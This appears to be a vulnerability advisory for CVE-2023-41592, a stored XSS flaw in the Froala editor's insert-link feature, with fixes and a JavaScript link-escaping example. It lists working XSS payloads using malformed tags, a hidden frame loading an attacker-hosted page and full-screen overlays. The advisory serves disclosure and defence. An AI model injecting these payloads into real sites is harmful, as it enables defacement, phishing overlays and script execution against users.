Descriptions (CVE-2023-41592)

A cross-site scripting (XSS) vulnerability was found in Froala Text Editor from version 4.0.1 up to 4.1.1.
It has been classified as critical; the affected item is the insert link component.
The preview text can be manipulated when inserting a link into the document, which allows XSS code to be inserted.
In a scenario where the content typed in the editor is stored in a table, this opens a stored XSS attack vector.
NOTE: The vendor was contacted early about this disclosure.


Examples of Payloads

              
                <b<button style="width:100vw; height:100vh; background: white; top:0 !important; left:0 !important; z-index:999 !important; border:none; background-image:url(https://porn-content.com/image.jpg) !important; background-repeat:no-repeat !important; background-position:center center !important;">Click Here $$</button>
                <i<img src='malicious-site.com'>
                <s<svg src='malicious-site.com'>
                <i<input type=image src='malicious-site.com'>
                <i<frame src='https://hacker.soarescorp.com/tools/pages/hacked.html'>
                <o<object></object>
                <d<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.5);z-index: 5000;" onclick="alert(1)" ></div>
                
              
            

References

Vulnerability found by: LUCAS 5O4R3S

- OWASP TOP10: https://owasp.org/Top10/
- Froala Vendor: https://froala.com/wysiwyg-editor/demo/
- HackTricks XSS: https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting
- OWASP Injection: https://owasp.org/Top10/A03_2021-Injection/

Mitre

You can view this CVE on the official MITRE website: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-41592

How to fix?

To avoid being exposed to this vulnerability, you can make the following adjustments:
- Update the editor component to a version above 4.1.1.
- Use JavaScript code to remove any HTML or XSS tags that exist within the <a> tags.
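
One way to apply the second adjustment in the application that stores or renders the editor content, as an added example that is not Froala code or part of the original advisory. It escapes the link text rather than stripping tags, because malformed openers such as `<i<img` are easy to miss with tag-removal patterns. The function names, the allowed-scheme policy and the `https://example.com/` target are assumptions.

```javascript
// Added example (not Froala code): treat a link's display text as plain text.
const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode every character that can open a tag, an attribute value or an entity.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ESCAPES[ch]);
}

// Assumed policy: only these schemes are acceptable link targets.
const ALLOWED_SCHEMES = new Set(['http:', 'https:', 'mailto:']);

// Returns the normalized absolute URL, or null when it is unparsable,
// relative, or uses a scheme outside the allow-list (e.g. javascript:).
function safeHref(href) {
  try {
    const url = new URL(String(href).trim());
    return ALLOWED_SCHEMES.has(url.protocol) ? url.href : null;
  } catch {
    return null;
  }
}

// Rebuilds the anchor from its two untrusted parts. If the target is
// rejected, only the escaped text is returned and no link is emitted.
function buildLink(href, text) {
  const label = escapeHtml(text);
  const url = safeHref(href);
  if (url === null) return label;
  return `<a href="${escapeHtml(url)}" rel="noopener noreferrer">${label}</a>`;
}

// Link texts taken from the payload list on this page; the href is constructed.
const SAMPLE_TEXTS = [
  "<i<img src='malicious-site.com'>",
  '<d<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.5);z-index: 5000;" onclick="alert(1)" ></div>',
];

function renderSamples() {
  return SAMPLE_TEXTS.map((text) => buildLink('https://example.com/', text));
}
```

Run the same rebuild on the server before the content is saved, since a client-side check alone can be bypassed by posting directly to the storage endpoint.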